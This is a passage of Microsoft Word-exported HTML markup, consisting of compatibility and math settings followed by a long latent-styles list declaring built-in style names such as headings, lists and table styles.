<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="371">
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 9"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="header"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footer"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index heading"/>
<w:LsdException Locked="false" Priority="35" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of figures"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope return"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="line number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="page number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of authorities"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="macro"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="toa heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 5"/>
<w:LsdException Locked="false" Priority="10" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Closing"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Signature"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="true"
UnhideWhenUsed="true" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Message Header"/>
<w:LsdException Locked="false" Priority="11" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Salutation"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Date"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Block Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Hyperlink"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="FollowedHyperlink"/>
<w:LsdException Locked="false" Priority="22" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Document Map"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Plain Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="E-mail Signature"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Top of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Bottom of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal (Web)"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Acronym"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Cite"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Code"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Definition"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Keyboard"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Preformatted"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Sample"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Typewriter"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Variable"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Table"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation subject"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="No List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Contemporary"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Elegant"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Professional"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Balloon Text"/>
<w:LsdException Locked="false" Priority="39" Name="Table Grid"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Theme"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" QFormat="true"
Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" QFormat="true"
Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" QFormat="true"
Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" QFormat="true"
Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" QFormat="true"
Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" QFormat="true"
Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" SemiHidden="true"
UnhideWhenUsed="true" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
<w:LsdException Locked="false" Priority="41" Name="Plain Table 1"/>
<w:LsdException Locked="false" Priority="42" Name="Plain Table 2"/>
<w:LsdException Locked="false" Priority="43" Name="Plain Table 3"/>
<w:LsdException Locked="false" Priority="44" Name="Plain Table 4"/>
<w:LsdException Locked="false" Priority="45" Name="Plain Table 5"/>
<w:LsdException Locked="false" Priority="40" Name="Grid Table Light"/>
<w:LsdException Locked="false" Priority="46" Name="Grid Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="Grid Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="Grid Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
